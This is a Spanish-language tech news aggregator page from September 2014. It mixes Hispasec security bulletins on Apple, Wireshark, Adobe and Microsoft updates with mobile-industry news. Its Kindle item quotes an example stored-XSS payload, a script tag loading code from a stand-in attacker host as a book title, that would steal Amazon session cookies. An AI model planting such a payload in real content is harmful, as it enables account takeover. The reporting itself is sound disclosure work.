Noticias

Actualización masiva de productos Apple: iOS, OS X, Safari…

Hispasec - hace 13 horas 1 min
Apple acaba de publicar actualizaciones para gran parte de sus productos. Como gran novedad destaca iOS 8, la nueva versión del sistema operativo para sus dispositivos móviles (iPhone, iPad, iPod… ). Pero además ha publicado las siguientes versiones actualizadas OS X Server 2.2.3, OS X Server 3.2.1, Safari 6.2, Safari 7.1, OS X Mavericks 10.9.5 y Security Update 2014-004, Xcode 6.0.1 y Apple TV 7.
Dada la gran cantidad de novedades y productos actualizados, vamos a realizar un breve repaso de las actualizaciones publicadas y problemas solucionados.
iOS 8 es la nueva versión del sistema operativo de Apple para sus productos móviles (iPad, iPhone, iPod…) que además de incluir cientos de novedades y mejoras (también en temas relacionados con la seguridad) además soluciona 56 nuevas vulnerabilidades. Los problemas corregidos van desde el propio kernel hasta las cuentas de usuario, WiFi, libro de direcciones, instalación de Apps, Bluetooth, CoreGraphins, Mail, etc… Una parte importante de los problemas podrían permitir a un atacante lograr ejecutar código arbitrario en los sistemas afectados.
También hay que destacar las actualizaciones para OS X que incluyen las versiones OS Server 2.2.3, OS X Server 3.2.1 y OS X Mavericks 10.9.5. La familia de servidores se ven afectados por vulnerabilidades en CoreCollaboration. Tanto OS X Server 2.2.3 como OS X Server3.2.1 solucionan una inyección SQL en el servidor Wiki, Además OS X Server 3.2.1 soluciona un cross-site scripting en el servidor Xcode y siete vulnerabilidades en PostgreSQL, la más grave de ellas podría permitir la ejecución remota de código arbitrario.
Por otra parte, también ha publicado OS X Mavericks v10.9.5 y Security Update 2014-004, destinado a corregir hasta 44 nuevas vulnerabilidades. Afectan a apache_mod_php, Bluetooth, CoreGraphics, Foundation, Intel Graphics Driver, IOAcceleratorFamily, IOHIDFamily, IOKit, Kernel, Libnotify, OpenSSL, QT Media Foundation y ruby. Una parte importante de estos problemas podrían permitir la ejecución remota de código arbitrario. Además OS X Mavericks v10.9.5 incluye la nueva versión Safari 7.0.6.

Las actualizaciones también han llegado a Safari, el popular navegador web de Apple, que se actualiza a lasversiones 6.2 y 7.1 para OS X Mountain Lion v10.8.5 y OS X Mavericks v10.9.5. Se solucionan 9 vulnerabilidades, la mayoría de ellas relacionadas con problemas de corrupción de memoria en WebKit, el motor de navegador de código abierto que es la base de Safari. Y podrían ser aprovechadas por un atacante remoto para provocar condiciones de denegación de servicio o ejecutar código arbitrario al visitar una página web específicamente creada.
Por último, Apple también ha publicado Apple TV 7 que soluciona 37 nuevas vulnerabilidades y Xcode 6.0.1, el entorno de desarrollo de Apple, que corrige una vulnerabilidad en subversión.
Más información:
iOS 8http://support.apple.com/kb/DL1758
About the security content of iOS 8http://support.apple.com/kb/HT6441
About the security content of OS X Server v2.2.3http://support.apple.com/kb/HT6449
About the security content of OS X Server v3.2.1http://support.apple.com/kb/HT6448
About the security content of Safari 6.2 and Safari 7.1http://support.apple.com/kb/HT6440
About the security content of OS X Mavericks v10.9.5 and Security Update 2014-004http://support.apple.com/kb/HT6443
About the security content of Apple TV 7http://support.apple.com/kb/HT6442
About the security content of Xcode 6.0.1http://support.apple.com/kb/HT6444


Antonio Roperoantonior@hispasec.comTwitter: @aropero

Categorías: Seguridad

Alemania, el país mejor conectado del mundo según Huawei

Canal PDA - hace 15 horas 28 mins
Japón y Corea del Sur son los países más hiperconectados de Asia, pero se ven superados por Alemania y los EEUU en el nuevo ‘índice de conectividad’ recién publicado por Huawei. Este fabricante chino ha creado el Índice Global de Conectividad (GCI, Global Connectivity Index), que se une al Índice Visual de Redes (VNI, Visual […]
Categorías: PDA / PPC

Boletines de seguridad para Wireshark

Hispasec - Jue, 18/09/2014 - 23:30
Wireshark Foundation ha publicado ocho boletines de seguridad que solucionan doce vulnerabilidades en Wireshark. Afectan a las ramas 1.10 y 1.12.
Wireshark es una aplicación de auditoría orientada al análisis de tráfico en redes muy popular que soporta una gran cantidad de protocolos y es de fácil manejo. Además Wireshark es software libre (sujeto a licencia GPL) y se encuentra disponible para la mayoría de sistemas operativos Unix y compatibles, así como Microsoft Windows.
Los boletines publicados corrigen errores relacionados con diversos disectores, que podrían ser aprovechados para provocar una denegación de servicio, bien por un excesivo consumo de recursos del sistema o causando que la aplicación deje de funcionar.
Se presentan a continuación los boletines, los disectores afectados y el identificador CVE asignado a cada uno de los fallos de seguridad:
  • wnpa-sec-2014-12: disector RTP (CVE-2014-6421 y CVE-2014-6422)
        
  • wnpa-sec-2014-13: bucle infinito relacionado con el disector MEGACO (CVE-2014-6423)
         
  • wnpa-sec-2014-14: disector Netflow (CVE-2014-6424)
         
  • wnpa-sec-2014-15: disector CUPS (CVE-2014-6425)
        
  • wnpa-sec-2014-16: bucle infinito relacionado con el disector HIP (CVE-2014-6426)
         
  • wnpa-sec-2014-17: disector RTSP (CVE-2014-6427)
         
  • wnpa-sec-2014-18: disector SES (CVE-2014-6427)
         
  • wnpa-sec-2014-19: cuatro vulnerabilidades relacionadas con el analizador DOS Sniffer (identificadores del CVE-2014-6429 al CVE-2014-6432). Descubiertas por Chaoqiang Zhang (de la Universidad del estado de Oregon, OSU) y Lewis Burns (de HP Fortify).


Todas estas vulnerabilidades podrían ser explotadas a través de la inyección de paquetes manipulados en la red, o convenciendo a un usuario para que abra un fichero de captura de tráfico especialmente manipulado.
Se encuentran afectadas las versiones de la ramas 1.10 y 1.12. Se han publicado las versiones 1.10.10 y 1.12.1, que corrigen todas las vulnerabilidades expuestas, en la página oficial.
Más información:
Download Wiresharkhttps://www.wireshark.org/download.html
wnpa-sec-2014-12 · RTP dissector crashhttps://www.wireshark.org/security/wnpa-sec-2014-12.html
wnpa-sec-2014-13 · MEGACO dissector infinite loophttps://www.wireshark.org/security/wnpa-sec-2014-13.html
wnpa-sec-2014-14 · Netflow dissector crashhttps://www.wireshark.org/security/wnpa-sec-2014-14.html
wnpa-sec-2014-15 · CUPS dissector crashhttps://www.wireshark.org/security/wnpa-sec-2014-15.html
wnpa-sec-2014-16 · HIP infinite loophttps://www.wireshark.org/security/wnpa-sec-2014-16.html
wnpa-sec-2014-17 · RTSP dissector crashhttps://www.wireshark.org/security/wnpa-sec-2014-17.html
wnpa-sec-2014-18 · SES dissector crashhttps://www.wireshark.org/security/wnpa-sec-2014-18.html
wnpa-sec-2014-19 · Sniffer file parser crashhttps://www.wireshark.org/security/wnpa-sec-2014-19.html



Juan José Ruiz
jruiz@hispasec.com
Categorías: Seguridad

Panasonic presenta un híbrido entre smartphone y cámara

Canal PDA - Jue, 18/09/2014 - 13:17
Panasonic ha presentado una combinación entre smartphone y cámara que sigue los pasos del Galaxy K Zoom de Samsung, pero mejora todavía más las especificaciones con el que asegura es “el mayor captador de imagen que se ha visto hasta ahora en un teléfono”. Pero tiene algunos aspectos pendientes. La Lumix Smart Camera CM1 estará […]
Categorías: PDA / PPC

HTC prepara una cámara para competir con GoPro

Canal PDA - Jue, 18/09/2014 - 13:03
HTC prepara su entrada en el mercado de las cámaras, con un dispositivo pensado para rivalizar con los productos de GoPro, según una información publicada en Bloomberg. Aparentemente, el asediado fabricante taiwanés de teléfonos ofrecerá una cámara equipada con captador de 16 megapíxels y objetivo “ultra gran angular”, que se conectará a smartphones y tabletas […]
Categorías: PDA / PPC

El segundo accionista de Jazztel se hace de rogar con la oferta de compra de Orange

Canal PDA - Jue, 18/09/2014 - 12:45
Alken Asset Management, el segundo mayor accionista de Jazztel, ha desestimado la oferta de 3.400 millones formulada por Orange para comprar la operadora española de fijo, por considerarla demasiado baja, asegura Expansión. La firma de inversiones, que posee un 5% del capital de Jazztel, opina que la oferta de 13 € por acción representa una […]
Categorías: PDA / PPC

El segundo accionista de Jazztel se resiste a la oferta de compra de Orange

Canal PDA - Jue, 18/09/2014 - 12:45
Alken Asset Management, el segundo mayor accionista de Jazztel, ha desestimado la oferta de 3.400 millones formulada por Orange para comprar la operadora española de fijo, por considerarla demasiado baja, asegura Expansión. La firma de inversiones, que posee un 5% del capital de Jazztel, opina que la oferta de 13 € por acción representa una […]
Categorías: PDA / PPC

Actualizaciones de seguridad para Adobe Reader y Acrobat

Hispasec - Mié, 17/09/2014 - 23:30
Adobe ha publicado una actualización para corregir ocho vulnerabilidades críticas en Adobe Reader y Acrobat en diferentes plataformas, que podrían permitir a un atacante tomar el control de los sistemas afectados.
Las versiones afectadas son Adobe Reader XI 10.0.8 (y anteriores) para Windows y Macintosh, Adobe Reader X 10.0.11 (y anteriores) para Windows y Macintosh.
Esta actualización soluciona una vulnerabilidad de uso después de liberar memoria que podría permitir la ejecución de código (CVE-2014-0560), una vulnerabilidad de universal cross-site scripting (UXSS) en la plataforma Macintosh (CVE-2014-0562), una corrupción de memoria que podría dar lugar a condiciones de denegación de servicio (CVE-2014-0563), desbordamientos de búfer que podrían permitir la ejecución de código (CVE-2014-0561, CVE-2014-0567), corrupción de memoria que podrían dar lugar a ejecución de código (CVE-2014-0565, CVE-2014-0566) y un salto de la sandbox que podría permitir la ejecución de código con privilegios elevados en Windows (CVE-2014-0568).
Para corregir estos problemas Adobe ha publicado las versiones Adobe Reader XI 11.0.09 y Adobe Reader X 10.1.12 para Windows and Macintosh, se recomienda actualizar a estas versiones empleando la opción de actualización automática de los productos o bien descargándolas desde la propia web de Adobe: http://www.adobe.com/downloads/.
Más información:
Security updates available for Adobe Reader and Acrobathttp://helpx.adobe.com/security/products/reader/apsb14-20.html




Antonio Roperoantonior@hispasec.com
Twitter: @aropero
Categorías: Seguridad

Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

Hispasec - Mar, 16/09/2014 - 23:50
Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.
El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).
El atacante podrá crear un libro con un título como <script src="https://www.atacante.org/script.js"></script>Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.
Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.
Más información:
Amazon.com Stored XSS via Book Metadatahttp://b.fl7.de/2014/09/amazon-stored-xss-book-metadata.html


Antonio Roperoantonior@hispasec.comTwitter: @aropero

Categorías: Seguridad

Orange comprará Jazztel por 3.400 millones de euros

Canal PDA - Mar, 16/09/2014 - 18:45
Nuevo episodio de la consolidación en el sector europeo de las telecomunicaciones. El grupo francés Orange ha formalizado una oferta de compra del 100% del capital de la operadora española de fijo Jazztel, a un precio de 13 euros por acción que valora la empresa en más de 3.300 millones de euros. Con la adquisición, […]
Categorías: PDA / PPC

La falta de privacidad sigue siendo el punto flaco de las aplicaciones móviles

Canal PDA - Mar, 16/09/2014 - 13:51
Muchas aplicaciones móviles no explican cómo recopilan, utilizan y revelan la información personal, según un estudio realizado por la Global Privacy Enforcement Network (GPEN). Un análisis de 1.211 títulos efectuado por 26 organismos reguladores de protección de datos de todo el mundo muestra que el 85% no explican adecuadamente lo que hacen con los datos […]
Categorías: PDA / PPC

Nokia asegura que la marca no está muerta del todo

Canal PDA - Mar, 16/09/2014 - 13:49
Nokia ha salido al paso de las informaciones publicadas que apuntan que Microsoft dejará de utilizar la marca Nokia en su gama de dispositivos móviles. La firma ha aclarado que el popular nombre finlandés no está a punto de desaparecer por completo. En un artículo de su blog, Barry French, vicepresidente de marketing y asuntos […]
Categorías: PDA / PPC

Sonos: conexión inalámbrica, ahora sin bridge

Canal PDA - Mar, 16/09/2014 - 13:46
Sonos, productor líder de sistemas inalámbricos de música, presenta la última actualización de software gratuito para sus equipos (versión 5.1).Gracias a ella, desde este momento es posible realizar la conexión inalámbrica entre los sistemas PLAY:1, PLAY:3 y PLAY:5, aprovechando la red Wi-Fi disponible en el hogar y sin necesidad de emplear un Bridge para este […]
Categorías: PDA / PPC

BlackBerry compra Movirtu, que permite tener dos números en el mismo móvil

Canal PDA - Mar, 16/09/2014 - 12:47
BlackBerry, la empresa de movilidad empresarial en fase de recuperación, ha anunciado la compra de Movirtu, una firma que suministra a las operadoras tecnología que hace posible tener activos varios números de teléfono en el mismo terminal. Según BlackBerry, el sistema de Movirtu mejora la gestión de dispositivos en los entornos de BYOD (Bring Your […]
Categorías: PDA / PPC

Google presenta los primeros smartphones con Android One y ampliará su alcance a otros países

Canal PDA - Mar, 16/09/2014 - 12:46
Google ha anunciado el lanzamiento comercial de los primeros teléfonos de su programa Android One, además de revelar la incorporación de un gran número de marcas y que prepara la expansión del programa a otras regiones. Los nuevos terminales están fabricados por las empresas ya anunciadas en su momento -Micromax, Karbonn y Spice- y utilizan […]
Categorías: PDA / PPC

Apple presume de 4 millones de iPhone 6 vendidos en 24 horas

Canal PDA - Mar, 16/09/2014 - 12:44
Apple asegura haber recibido “un número récord de pedidos iniciales anticipados” de sus nuevos modelos de iPhone, habiendo superado los cuatro millones durante las primeras 24 horas. Según la empresa, “la demanda de los nuevos iPhones supera las existencias previstas inicialmente”, y si bien “un porcentaje significativo” serán entregados a los clientes a partir del […]
Categorías: PDA / PPC

Orange lanza una oferta por el operador español Jazztel

Canal PDA - Lun, 15/09/2014 - 23:29
Orange ha anunciado hoy que el Grupo va a lanzar una oferta pública de adquisición de acciones amistosa por el 100% del capital de Jazztel, una compañía cotizada en España (BMAD:JAZ). Tras esta adquisición, Orange se convertiría en el segundo operador de España en banda ancha fija y en uno de los más dinámicos en […]
Categorías: PDA / PPC

Nuevo problema en las actualizaciones de Microsoft

Hispasec - Lun, 15/09/2014 - 18:24
Por segundo mes consecutivo Microsoft se ha visto obligado a retirar del centro de descargas una de las actualizaciones publicadas dentro del conjunto de boletines de seguridad publicado el pasado martes. En esta ocasión los problemas se han dado con el boletín MS14-055en servidores Microsoft Lync Server 2010.
Microsoft ha retirado la actualización 2982385 para Microsoft Lync Server 2010 perteneciente al boletín MS14-045 del "Download Center". Este boletín estaba calificado como "importante" y solucionaba tres vulnerabilidades que podrían permitir a un atacante provocar denegaciones de servicio en servidores Lync 2010 y 2013. En esta ocasión parece que los problemas solo se dan en servidores Lync 2010.
Microsoft ha indicado que ha retirado la actualización debido a que algunos usuarios no han podido llegar a instalar correctamente la actualización 2982385 para Microsoft Lync Server 2010. Según han reportado algunos usuarios de Lync 2010 han sufrido problemas en el servidor Edge al haber instalado la actualización KB2953590 para OCSCore pero no poder instalar correctamente la actualización 2982385 para Lync Server.
Dentro de unos días, tal y como ocurrió el pasado mes con la actualización MS14-045 Microsoft volverá a publicar la actualización con todos los problemas ya solucionados. Aunque estos dos problemas se han dado en productos y configuraciones muy determinados y poco habituales, no deja de ser preocupante que el mismo suceso haya ocurrido por dos meses consecutivos. Microsoft establece grandes controles antes de publicar un parche, resulta complejo evaluar una actualización en todas las posibles configuraciones, idiomas, versiones, etc. Pero esperamos, por la tranquilidad de todos, que este tipo de problemas no se vuelvan a repetir.
Más información:
una-al-dia (17/08/2014) Microsoft recomienda desinstalar la actualización MS14-045http://unaaldia.hispasec.com/2014/08/microsoft-recomienda-desinstalar-la.html
MS14-055 Broke My Edge Serverhttp://www.lyncexch.co.uk/ms14-055-broke-my-edge-server/
Microsoft Security Bulletin MS14-055 - Important Vulnerabilities in Microsoft Lync Server Could Allow Denial of Service (2990928)https://technet.microsoft.com/library/security/ms14-055
una-al-dia (09/09/2014) Boletines de seguridad de Microsoft de septiembrehttp://unaaldia.hispasec.com/2014/09/boletines-de-seguridad-de-microsoft-de.html
una-al-dia (27/08/2014) Microsoft vuelve a publicar la actualización MS14-045http://unaaldia.hispasec.com/2014/08/microsoft-vuelve-publicar-la.html

Antonio Roperoantonior@hispasec.com
Twitter: @aropero
Categorías: Seguridad

Samsung y Tous se unen para vestir de tecnología y moda tu muñeca

Canal PDA - Lun, 15/09/2014 - 17:55
Samsung Electronics Co., Ltd., líder mundial en tecnologías de convergencia digital, y TOUS, firma de joyería y accesorios con más de 400 tiendas TOUS en más de 40 países, han demostrado la buena sintonía entre tecnología y moda con la presentación del dispositivo Gear Fit TOUS for Samsung. La colaboración entre ambas compañías ha dado […]
Categorías: PDA / PPC

Apple anuncia un récord de pedidos anticipados del iPhone 6 y el iPhone 6 Plus, alcanzando los cuatro millones de unidades en las primeras 24 horas

Canal PDA - Lun, 15/09/2014 - 16:10
Apple ha anunciado hoy un récord de pedidos anticipados el primer día del iPhone 6 y el iPhone 6 Plus, los avances más relevantes en la historia del iPhone, con más de cuatro millones de unidades en las primeras 24 horas. La demanda de los nuevos iPhone supera la disponibilidad inicial para pedidos anticipados y, […]
Categorías: PDA / PPC
Distribuir contenido